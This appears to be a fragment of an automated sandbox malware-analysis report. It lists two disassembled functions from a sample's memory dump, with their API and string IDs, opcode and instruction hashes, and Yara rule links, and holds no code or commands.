                                                                                  Function 018C2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: %%%u$]:%u
                                                                                  • API String ID: 48624451-3050659472
                                                                                  • Opcode ID: 7877def8857ce3154d65a05668798d64c799d132291c6eb3aabd200aeb7a61a8
                                                                                  • Instruction ID: 8facff4c1142d061be3789a177834f630e505e41c8aca62d684ae350484e942a
                                                                                  • Opcode Fuzzy Hash: 7877def8857ce3154d65a05668798d64c799d132291c6eb3aabd200aeb7a61a8
                                                                                  • Instruction Fuzzy Hash: 52315472A002199FDB61DE3DCC40BEEB7B9FB54710F44459AE949E3280EB30DB549BA1
                                                                                  Function 01819126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $$@
                                                                                  • API String ID: 0-1194432280
                                                                                  • Opcode ID: 28a5985df5ca8f55ea23c899ffa983af25e7108762dd6277876c17be03a5033d
                                                                                  • Instruction ID: 484e7aad8a1ee3e004b12e9a2031dca0c8c0ff5722b24aa5327914e8fcb79bc4
                                                                                  • Opcode Fuzzy Hash: 28a5985df5ca8f55ea23c899ffa983af25e7108762dd6277876c17be03a5033d
                                                                                  • Instruction Fuzzy Hash: EA811B72D002699BDB35CB58CC44BEAB7B9AB48714F0041DAEA19F7280D7709F84CFA1